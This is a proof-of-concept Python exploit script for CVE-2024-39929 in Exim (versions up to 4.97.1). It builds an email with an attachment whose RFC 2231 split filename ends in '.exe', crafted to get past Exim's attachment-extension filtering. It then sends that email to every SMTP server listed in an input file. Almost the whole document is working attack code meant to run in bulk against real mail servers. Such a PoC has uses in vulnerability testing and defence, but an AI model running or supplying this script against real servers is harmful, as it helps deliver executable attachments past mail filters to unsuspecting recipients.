# Exploit Title: Exim - CVE-2024-39929 - POC
# Date: 07/29/2024
# Exploit Author: Michael Fry
# Vendor Homepage: https://www.exim.org/
# Software Link: https://github.com/michael-david-fry/CVE-2024-39929
# Version: <= 4.97.1
# Tested on: Kali Linux
# CVE: CVE-2024-39929

import smtplib
import argparse
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from email.mime.base import MIMEBase
from email import encoders

def send_exploit_email(smtp_server, smtp_port, sender_email, recipient_email):
    try:
        # Craft the payload for the vulnerability
        payload = 'This is a CVE-2024-39929 test.'

        # Create the email message with multiple parts
        msg = MIMEMultipart()
        msg['Subject'] = f'Exploit CVE-2024-39929 Test through {smtp_server}'
        msg['From'] = sender_email
        msg['To'] = recipient_email

        # Add the main body of the email
        body = MIMEText(payload, 'plain')
        msg.attach(body)

        # Create the crafted attachment
        attachment = MIMEBase('application', 'octet-stream')
        attachment.set_payload(payload)
        encoders.encode_base64(attachment)

        # Add the headers for the attachment to exploit the vulnerability
        attachment.add_header('Content-Disposition', 'attachment; filename*0="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*1="AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"; filename*2=".exe"')

        msg.attach(attachment)

        # Connect to the SMTP server
        with smtplib.SMTP(smtp_server, smtp_port) as server:
            server.set_debuglevel(1)  # Enable debug output

            # Send EHLO command
            server.ehlo()

            # Start TLS if supported
            if server.has_extn('STARTTLS'):
                server.starttls()
                server.ehlo()

            # Send the exploit email
            server.sendmail(sender_email, [recipient_email], msg.as_string())
            print(f"Exploit email sent to {smtp_server}")

    except Exception as e:
        print(f"Error sending email to {smtp_server}: {e}")

def read_servers_from_file(file_path):
    with open(file_path, 'r') as file:
        servers = [line.strip() for line in file if line.strip()]
    return servers

def main():
    parser = argparse.ArgumentParser(description="Send exploit email to a list of SMTP servers.")
    parser.add_argument('file_path', help='Path to the file containing the list of SMTP servers')
    args = parser.parse_args()

    sender_email = input("Enter the sender email address: ")
    recipient_email = input("Enter the recipient email address: ")

    smtp_servers = read_servers_from_file(args.file_path)

    for smtp_server in smtp_servers:
        print(f"\nConnecting to {smtp_server}...")
        send_exploit_email(smtp_server, 25, sender_email, recipient_email)

if __name__ == "__main__":
    main()